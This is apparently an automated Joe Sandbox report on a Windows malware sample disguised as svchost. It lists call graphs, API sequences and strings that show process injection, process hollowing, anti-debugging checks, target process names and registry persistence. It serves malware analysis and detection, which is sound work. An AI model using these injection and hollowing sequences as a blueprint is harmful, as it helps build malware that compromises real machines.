1217->985 1218->987 1219->989 1220->991 1221->993 1222->995 1223->997 1224->999 1225->1001 1226->1003 1227->1005 1228->1007 1229->1009 1230->1011 1231->1013 1232->1015 1233->1017 1234->1019 1235->1021 1236->1023 1237->1025 1238->1027 1239->1029 1240->1031 1241->1033 1242->1035 1243->1037 1244->1039 1245->1041 1246->1043 1247->1045 1248->1047 1249->1049 1250->1051 1251->1053 1252->1055 1253->1057 1254->1059 1255->1061 1256->1063 1257->1065 1258->1067 1259->1069 1260->1071 1261->1073 1262->1075 1263->1077 1264->1079 1265->1081 1266->1083 1267->1085 1268->1087 1269->1089 1270->1091 1271->1093 1272->1095 1273->1097 1274->1099 1275->1101 1276->1103 1277->1105 1278->1107 1279->1109 1280->1111 1281->1113 1282->1115 1283->1117 1284->1119 1285->1121 1286->1123 1287->1125 1288->1127 1289->1135 1291 7ff67e6d3af5 VirtualFree 1290->1291 1292 7ff67e6d3b08 1290->1292 1291->1292 1292->1132 1328 7ff67e6d3704 GetWindowsDirectoryW 1293->1328 1295 7ff67e6d38b3 8 API calls 1295->1152 1297 7ff67e6d4585 GetFileSize GetProcessHeap RtlAllocateHeap 1296->1297 1298 7ff67e6d457e 1296->1298 1299 7ff67e6d45ce CloseHandle 1297->1299 1300 7ff67e6d45e0 ReadFile 1297->1300 1298->1154 1299->1298 1301 7ff67e6d462f 1300->1301 1302 7ff67e6d4607 GetProcessHeap HeapFree CloseHandle 1300->1302 1303 7ff67e6d4648 GetProcessHeap HeapFree CloseHandle 1301->1303 1305 7ff67e6d4670 1301->1305 1302->1298 1303->1298 1304 7ff67e6d47db GetProcessHeap RtlFreeHeap CloseHandle 1304->1298 1305->1304 1306 7ff67e6d472b GetProcessHeap RtlAllocateHeap 1305->1306 1307 7ff67e6d4774 1306->1307 1307->1304 1333 7ff67e6d3fc4 CreateToolhelp32Snapshot 1308->1333 1311 7ff67e6d10d8 OpenProcess 1312 7ff67e6d111f 1311->1312 1315 7ff67e6d1115 1311->1315 1340 7ff67e6d13c4 GetModuleHandleA GetProcAddress 1312->1340 1314 7ff67e6d112c 1314->1315 1316 7ff67e6d11fe VirtualAllocEx 1314->1316 1315->1155 1316->1315 1317 7ff67e6d124f WriteProcessMemory 1316->1317 1317->1315 1318 7ff67e6d1286 WriteProcessMemory 1317->1318 1318->1315 1319 7ff67e6d12d1 1318->1319 1342 7ff67e6d1444 GetSystemInfo 1319->1342 1322 7ff67e6d12fe GetModuleHandleA GetProcAddress 1322->1315 1324 7ff67e6d1338 RtlCreateUserThread 1322->1324 1323 7ff67e6d1444 GetSystemInfo 1325 7ff67e6d12f4 1323->1325 1324->1315 1326 7ff67e6d1399 CloseHandle 1324->1326 1325->1322 1325->1326 1327 7ff67e6d13b2 1326->1327 1327->1315 1329 7ff67e6d374e 1328->1329 1330 7ff67e6d3758 GetVolumeInformationW 1328->1330 1329->1330 1332 7ff67e6d37d4 1330->1332 1331 7ff67e6d383e wsprintfW 1331->1295 1332->1331 1334 7ff67e6d3fff Process32FirstW 1333->1334 1335 7ff67e6d32f2 1333->1335 1336 7ff67e6d401e wcscmp 1334->1336 1337 7ff67e6d4059 CloseHandle 1334->1337 1335->1311 1338 7ff67e6d4042 Process32NextW 1336->1338 1339 7ff67e6d4035 1336->1339 1337->1335 1338->1336 1338->1337 1339->1337 1341 7ff67e6d13ff 1340->1341 1341->1314 1343 7ff67e6d12ea 1342->1343 1343->1322 1343->1323 1345 7ff67e6d434a 1344->1345 1346 7ff67e6d436b GetLastError 1344->1346 1350 7ff67e6d4244 GetFileSize 1345->1350 1348 7ff67e6d322f CreateThread Sleep CreateThread 1346->1348 1348->871 1355 7ff67e6d3b14 VirtualAlloc 1350->1355 1352 7ff67e6d4270 1353 7ff67e6d42ba CloseHandle 1352->1353 1354 7ff67e6d4284 SetFilePointer ReadFile 1352->1354 1353->1348 1354->1353 1355->1352 1357 7ff67e6d39b5 1356->1357 1358 7ff67e6d39b9 RegSetValueExW RegCloseKey 1356->1358 1357->1170 1358->1357 1359 7ff67e6d317c 1360 7ff67e6d3185 1359->1360 1361 7ff67e6d319e 1360->1361 1364 7ff67e6d2ffc 1360->1364 1369 7ff67e6d2dfc CreateMutexExA 1364->1369 1367 7ff67e6d305c SleepEx 1367->1360 1368 7ff67e6d3017 Sleep CreateThread WaitForSingleObject 1368->1367 1370 7ff67e6d2e45 GetLastError 1369->1370 1371 7ff67e6d2e28 ReleaseMutex CloseHandle 1369->1371 1373 7ff67e6d2e52 ReleaseMutex CloseHandle 1370->1373 1374 7ff67e6d2e6f ReleaseMutex CloseHandle 1370->1374 1372 7ff67e6d2e87 1371->1372 1372->1367 1372->1368 1373->1372 1374->1372 1375 7ff67e6d2f2c 1376 7ff67e6d3884 11 API calls 1375->1376 1377 7ff67e6d2f6b 1376->1377 1378 7ff67e6d4524 17 API calls 1377->1378 1379 7ff67e6d2f8f 1378->1379 1380 7ff67e6d4084 5 API calls 1379->1380 1381 7ff67e6d2fb2 1380->1381 1382 7ff67e6d10d8 11 API calls 1381->1382 1383 7ff67e6d2fc7 GetProcessHeap HeapFree 1382->1383 1384 7ff67e6d2e9c CreateMutexA 1385 7ff67e6d2ede GetLastError 1384->1385 1386 7ff67e6d2ec1 ReleaseMutex CloseHandle 1384->1386 1388 7ff67e6d2eeb ReleaseMutex CloseHandle 1385->1388 1389 7ff67e6d2f08 ReleaseMutex CloseHandle 1385->1389 1387 7ff67e6d2f20 1386->1387 1388->1387 1389->1387 1392 7ff67e6d337c 1395 7ff67e6d24cc GetModuleFileNameW 1392->1395 1396 7ff67e6d254d 1395->1396 1402 7ff67e6d2548 1395->1402 1397 7ff67e6d25a1 1396->1397 1398 7ff67e6d258b 1396->1398 1438 7ff67e6d240c ExpandEnvironmentStringsW 1397->1438 1399 7ff67e6d2595 1398->1399 1400 7ff67e6d25bf 1398->1400 1399->1402 1440 7ff67e6d248c ExpandEnvironmentStringsW 1399->1440 1439 7ff67e6d244c ExpandEnvironmentStringsW 1400->1439 1403 7ff67e6d25b6 1403->1402 1406 7ff67e6d2611 CreateProcessW 1403->1406 1406->1402 1407 7ff67e6d266c CreateFileW 1406->1407 1407->1402 1408 7ff67e6d26b3 GetFileSize 1407->1408 1409 7ff67e6d26d1 1408->1409 1410 7ff67e6d26db CloseHandle 1408->1410 1409->1410 1411 7ff67e6d26eb VirtualAlloc 1409->1411 1410->1402 1412 7ff67e6d2725 ReadFile 1411->1412 1413 7ff67e6d2715 CloseHandle 1411->1413 1414 7ff67e6d2752 VirtualFree CloseHandle 1412->1414 1415 7ff67e6d2775 CloseHandle GetThreadContext 1412->1415 1413->1402 1414->1402 1416 7ff67e6d27c5 VirtualFree 1415->1416 1417 7ff67e6d27dd ReadProcessMemory GetModuleHandleA GetProcAddress 1415->1417 1416->1402 1418 7ff67e6d2860 1417->1418 1419 7ff67e6d2864 VirtualFree 1418->1419 1420 7ff67e6d287c VirtualAllocEx 1418->1420 1419->1402 1421 7ff67e6d28ff WriteProcessMemory 1420->1421 1422 7ff67e6d28e7 VirtualFree 1420->1422 1423 7ff67e6d2935 VirtualFree 1421->1423 1426 7ff67e6d294d 1421->1426 1422->1402 1423->1402 1424 7ff67e6d2983 WriteProcessMemory 1425 7ff67e6d2a0e VirtualFree 1424->1425 1424->1426 1425->1402 1426->1424 1431 7ff67e6d2a2b 1426->1431 1427 7ff67e6d2d1c WriteProcessMemory SetThreadContext 1429 7ff67e6d2da2 VirtualFree 1427->1429 1430 7ff67e6d2db7 ResumeThread 1427->1430 1428 7ff67e6d2a9d RtlCompareMemory 1428->1431 1435 7ff67e6d2af0 1428->1435 1429->1402 1432 7ff67e6d2dde VirtualFree 1430->1432 1433 7ff67e6d2dc9 VirtualFree 1430->1433 1431->1427 1431->1428 1432->1402 1433->1402 1434 7ff67e6d2d17 1434->1427 1435->1434 1436 7ff67e6d2c20 ReadProcessMemory WriteProcessMemory 1435->1436 1436->1435 1437 7ff67e6d2cf5 VirtualFree 1436->1437 1437->1402 1438->1403 1439->1403 1440->1403 1441 7ff67e6d306c 1442 7ff67e6d3075 1441->1442 1443 7ff67e6d3161 1442->1443 1446 7ff67e6d3be4 RegDeleteKeyW 1442->1446 1447 7ff67e6d3de4 9 API calls 1442->1447 1448 7ff67e6d3974 3 API calls 1442->1448 1450 7ff67e6d4404 CreateFileW 1442->1450 1455 7ff67e6d3b44 RegOpenKeyExW 1442->1455 1446->1442 1447->1442 1449 7ff67e6d3151 Sleep 1448->1449 1449->1442 1451 7ff67e6d445f 1450->1451 1452 7ff67e6d449a 1450->1452 1458 7ff67e6d4384 SetFilePointer WriteFile SetEndOfFile 1451->1458 1452->1442 1454 7ff67e6d447b SetFileAttributesW CloseHandle 1454->1452 1456 7ff67e6d3bd2 1455->1456 1457 7ff67e6d3b98 RegSetValueExW RegCloseKey 1455->1457 1456->1442 1457->1456 1458->1454 1479 7ff67e6d333c 1480 7ff67e6d24cc 36 API calls 1479->1480 1481 7ff67e6d334c 1480->1481 1390 7ff67e6d1088 GetModuleHandleA GetProcAddress 1391 7ff67e6d10bb 1390->1391

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF67E6DE9B3 1 Function_00007FF67E6DFAB3 2 Function_00007FF67E6D44B4 3 Function_00007FF67E6DDEB4 4 Function_00007FF67E6E00AA 5 Function_00007FF67E6D31AC 6 Function_00007FF67E6D36AC 7 Function_00007FF67E6DE9A9 8 Function_00007FF67E6D40A4 70 Function_00007FF67E6D3B14 8->70 95 Function_00007FF67E6D3AE4 8->95 9 Function_00007FF67E6D3CA4 10 Function_00007FF67E6DE7A5 11 Function_00007FF67E6DF1A1 12 Function_00007FF67E6D329C 20 Function_00007FF67E6D4084 12->20 21 Function_00007FF67E6D3884 12->21 66 Function_00007FF67E6D4524 12->66 67 Function_00007FF67E6D3C24 12->67 102 Function_00007FF67E6D10D8 12->102 13 Function_00007FF67E6D149C 14 Function_00007FF67E6D339C 15 Function_00007FF67E6D2E9C 16 Function_00007FF67E6DCE9D 17 Function_00007FF67E6DE796 18 Function_00007FF67E6D248C 19 Function_00007FF67E6D1088 108 Function_00007FF67E6D3FC4 20->108 77 Function_00007FF67E6D3704 21->77 22 Function_00007FF67E6D4384 23 Function_00007FF67E6D147F 24 Function_00007FF67E6DB180 25 Function_00007FF67E6D317C 82 Function_00007FF67E6D2FFC 25->82 26 Function_00007FF67E6D337C 106 Function_00007FF67E6D24CC 26->106 27 Function_00007FF67E6DF67D 28 Function_00007FF67E6DB277 29 Function_00007FF67E6DB776 30 Function_00007FF67E6DB778 31 Function_00007FF67E6DB772 32 Function_00007FF67E6D3974 33 Function_00007FF67E6DC874 34 Function_00007FF67E6D306C 34->32 56 Function_00007FF67E6D3B44 34->56 78 Function_00007FF67E6D4404 34->78 97 Function_00007FF67E6D3BE4 34->97 98 Function_00007FF67E6D3DE4 34->98 35 Function_00007FF67E6DFA6D 36 Function_00007FF67E6DE46C 37 Function_00007FF67E6DE465 38 Function_00007FF67E6D2160 39 Function_00007FF67E6DB061 40 Function_00007FF67E6DB05A 41 Function_00007FF67E6D335C 41->106 42 Function_00007FF67E6DEB58 43 Function_00007FF67E6DFD58 44 Function_00007FF67E6DB052 45 Function_00007FF67E6DE155 46 Function_00007FF67E6DE454 47 Function_00007FF67E6DC14F 48 Function_00007FF67E6DB04E 49 Function_00007FF67E6DE151 50 Function_00007FF67E6DB250 51 Function_00007FF67E6D244C 52 Function_00007FF67E6D354D 53 Function_00007FF67E6DF443 54 Function_00007FF67E6D1444 55 Function_00007FF67E6D4244 55->70 57 Function_00007FF67E6DDB44 58 Function_00007FF67E6E0340 59 Function_00007FF67E6D153C 59->13 89 Function_00007FF67E6D14EC 59->89 60 Function_00007FF67E6D333C 60->106 61 Function_00007FF67E6DC038 62 Function_00007FF67E6D3A34 62->21 62->32 62->77 63 Function_00007FF67E6DE12F 64 Function_00007FF67E6D2F2C 64->20 64->21 64->66 64->67 64->102 65 Function_00007FF67E6DE129 66->2 68 Function_00007FF67E6DE812 69 Function_00007FF67E6DFD12 71 Function_00007FF67E6DEA11 72 Function_00007FF67E6DD70A 73 Function_00007FF67E6D340C 73->5 73->8 73->9 73->12 73->14 73->59 73->62 74 Function_00007FF67E6D320C 73->74 96 Function_00007FF67E6D41E4 73->96 103 Function_00007FF67E6D3ED4 73->103 74->21 86 Function_00007FF67E6D42F4 74->86 75 Function_00007FF67E6D240C 76 Function_00007FF67E6DE408 104 Function_00007FF67E6D36D4 77->104 78->22 79 Function_00007FF67E6D1000 80 Function_00007FF67E6DBBFB 81 Function_00007FF67E6D2DFC 82->81 83 Function_00007FF67E6DBBF7 84 Function_00007FF67E6DBBF9 85 Function_00007FF67E6DC4F8 86->55 87 Function_00007FF67E6E02F0 88 Function_00007FF67E6DF4EB 90 Function_00007FF67E6DD2E7 91 Function_00007FF67E6DF4E7 92 Function_00007FF67E6DD2E9 93 Function_00007FF67E6DF4E9 94 Function_00007FF67E6DD2E2 99 Function_00007FF67E6DD2E5 100 Function_00007FF67E6DC2E4 101 Function_00007FF67E6DCCE1 102->54 102->79 109 Function_00007FF67E6D13C4 102->109 105 Function_00007FF67E6DB0D5 106->18 106->51 106->75 107 Function_00007FF67E6DB2C8 110 Function_00007FF67E6DD7BB 111 Function_00007FF67E6D36BC 112 Function_00007FF67E6D35B9 113 Function_00007FF67E6DBFB8

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF67E6D340C Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff67e6d340c-7ff67e6d3422 call 7ff67e6d153c call 7ff67e6d31ac 236 7ff67e6d3424-7ff67e6d3426 ExitProcess 231->236 237 7ff67e6d342c-7ff67e6d345a call 7ff67e6d40a4 call 7ff67e6d3ca4 call 7ff67e6d3ed4 231->237 244 7ff67e6d34ab-7ff67e6d34be call 7ff67e6d3ed4 237->244 245 7ff67e6d345c-7ff67e6d346d call 7ff67e6d41e4 237->245 250 7ff67e6d34c0-7ff67e6d34d1 call 7ff67e6d41e4 244->250 251 7ff67e6d34fc-7ff67e6d350f call 7ff67e6d3ed4 244->251 252 7ff67e6d3482-7ff67e6d3484 ExitProcess 245->252 253 7ff67e6d346f-7ff67e6d3480 call 7ff67e6d41e4 245->253 262 7ff67e6d34d3-7ff67e6d34d5 ExitProcess 250->262 263 7ff67e6d34db call 7ff67e6d320c 250->263 260 7ff67e6d3552-7ff67e6d3568 call 7ff67e6d3a34 call 7ff67e6d339c 251->260 261 7ff67e6d3511-7ff67e6d3522 call 7ff67e6d41e4 251->261 253->252 264 7ff67e6d348a call 7ff67e6d329c 253->264 282 7ff67e6d35be-7ff67e6d3696 CreateThread * 3 WaitForMultipleObjects ExitProcess 260->282 283 7ff67e6d356a-7ff67e6d357b call 7ff67e6d41e4 260->283 275 7ff67e6d3524-7ff67e6d3526 ExitProcess 261->275 276 7ff67e6d352c call 7ff67e6d320c 261->276 271 7ff67e6d34e0-7ff67e6d34e5 263->271 269 7ff67e6d348f-7ff67e6d3494 264->269 273 7ff67e6d34a3-7ff67e6d34a5 ExitProcess 269->273 274 7ff67e6d3496-7ff67e6d34a1 SleepEx 269->274 277 7ff67e6d34f4-7ff67e6d34f6 ExitProcess 271->277 278 7ff67e6d34e7-7ff67e6d34f2 Sleep 271->278 274->269 284 7ff67e6d3531-7ff67e6d3536 276->284 278->271 289 7ff67e6d3590-7ff67e6d3592 ExitProcess 283->289 290 7ff67e6d357d-7ff67e6d358e call 7ff67e6d41e4 283->290 286 7ff67e6d3545-7ff67e6d3547 ExitProcess 284->286 287 7ff67e6d3538-7ff67e6d3543 Sleep 284->287 287->284 290->289 293 7ff67e6d3598 call 7ff67e6d329c 290->293 295 7ff67e6d359d-7ff67e6d35a2 293->295 296 7ff67e6d35a4-7ff67e6d35af Sleep 295->296 297 7ff67e6d35b1-7ff67e6d35b3 ExitProcess 295->297 296->295
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 038771749d3d7642afb54e91ef10106eb0bf85de265d58aed9308be7d6a062b0
                                                                                                                                                                                                                        • Instruction ID: 5cb57e2c051abffecc5ed2acf8bde7d1034dc4503263405450667cb2db5308f6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 038771749d3d7642afb54e91ef10106eb0bf85de265d58aed9308be7d6a062b0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F61FD2AA68A8381EE65EB21E85937B6260AFB4700FF00135F54EC65D6DE2DE50DE610
                                                                                                                                                                                                                        Function 00007FF67E6D10D8 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: 03f7ad54ce5e2d6a3d0f3db6287a51554fdd0eb8ab4b1090cc3d2c0e04c54606
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3871FE7651CA8586EB70CB25E44436BB7A0F7A4744FB04135E68DC6B98DFBCD488DB40
                                                                                                                                                                                                                        Function 00007FF67E6D40A4 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: 102e4c124bf4c1df3448acea6882717d8c87c0ea20a0158643b3a765ddb603fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3311936628A8186DB50CB15E85472BB770FBE4B80F601035FA8E87B68DF3CD4499B00
                                                                                                                                                                                                                        Function 00007FF67E6D4524 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction ID: 80103667cd8a2b5769c2335525c66acc9c65a313d7e472131a31ec49a5dfcd1c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB811F36618B8182EB50CB56F48436BB7A0FBD9B91F604135EA8D87B68DF7CD458DB00
                                                                                                                                                                                                                        Function 00007FF67E6D3884 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF67E6D3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetVolumeInformationW.KERNELBASE ref: 00007FF67E6D37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: wsprintfW.USER32 ref: 00007FF67E6D3862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: ec77e8c02a9b20bed7fb825675a5b9cc69894752874fa47d0c29b2528e289f8d
                                                                                                                                                                                                                        • Instruction ID: 24a8dbd99fedf7cfecff0489240cab7eef8c202ae4ff409e73472771e90d768d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec77e8c02a9b20bed7fb825675a5b9cc69894752874fa47d0c29b2528e289f8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C11302A63898685DF60CF25F85436B6362FBE4B44FA05032E94E87A28DF3CD00CD744
                                                                                                                                                                                                                        Function 00007FF67E6D2DFC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
